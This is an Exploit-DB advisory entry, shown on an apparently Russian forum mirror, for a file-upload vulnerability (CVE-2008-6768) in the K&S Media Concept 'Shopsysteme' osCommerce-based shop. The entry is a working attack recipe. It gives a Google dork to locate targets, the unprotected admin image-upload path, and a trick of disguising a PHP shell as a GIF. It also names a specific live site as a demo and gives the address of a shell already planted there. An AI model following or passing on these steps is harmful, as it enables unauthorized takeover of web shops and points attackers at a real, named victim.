- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 7500
- Проверка EDB
-
- Пройдено
- Автор
- MNT
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-6768
- Дата публикации
- 2008-12-17
Код:
## Script Name: Shopsysteme (new version oscommerce)
## Download: http://www.shopsystem-forum.de/product_info.php?cPath=22&products_id=43 (299 euro) :)
## Author: mNt
## File Upload Bug
## Google Dork: intext:Powered by K&S Media Concept - Shopsysteme [Powered by K&S Media Concept - Shopsysteme için yaklaşık 32.900 sonuçtan 191 - 200 arası sonuçlar (0,51 saniye)]
## Use:
http://www.example.com/
after add: /admin/editor/images.php ==> http://www.example.com/admin/editor/images.php
File uploaded php shell
after in url: http://www.example.com/images/upload/mNt.php
Attention: Shell Code Ä°n GIF89;a
## Live demo: http://www.trampleandfetish.de/admin/editor/image.php
## Php Shell Adres: http://www.trampleandfetish.de/images/upload/data.php
## Thanks: DelİDolU, HeDgEs, Scarface, Cih@t, Suskun Dünyam, Lodos2005, Sabotage
## web Site: www.rootingforced.org || www.rootingforced.com || www.rootingforced.net
# milw0rm.com [2008-12-17]- Источник
- www.exploit-db.com
